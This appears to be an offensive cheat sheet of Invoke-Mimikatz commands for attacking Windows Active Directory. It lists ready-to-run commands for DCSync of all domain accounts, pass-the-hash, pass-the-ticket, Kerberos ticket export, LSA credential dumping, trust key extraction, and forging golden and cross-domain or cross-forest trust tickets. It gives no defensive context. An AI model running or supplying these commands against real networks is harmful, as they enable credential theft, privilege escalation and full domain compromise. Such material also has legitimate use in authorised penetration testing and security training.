Mimikatz

DCSync

Invoke-Mimikatz -Command '"lsadump::dcsync /user:DOMAIN\USER"'

Invoke-Mimikatz -Command '"lsadump::dcsync /all"'

# When DCSyncing (and for other actions) you need to know the domain's short (NetBIOS) name.
# It can be resolved with Translate-Canonical:
https://gist.github.com/HarmJ0y/4226349db644e6549605

Pass-The-Ticket

Invoke-Mimikatz -Command '"kerberos::ptt TGS_ticket_file.kirbi"'

Pass-The-Hash

Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:DOMAIN.local /ntlm:<ntlmhash> /run:powershell.exe"'

Extract Tickets

Invoke-Mimikatz -Command '"kerberos::list /export"'

Dump Local Creds

Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

Extract Trust Keys

Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc

Forge Golden Ticket

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:HASH /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

Forge Inter-Domain Trust Ticket

Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:HASH /service:krbtgt /target:TARGETDOMAIN.local /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi"'

Forge Inter-Forest Trust Ticket

Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /rc4:HASH /service:krbtgt /target:TARGETFOREST.local /ticket:C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi"'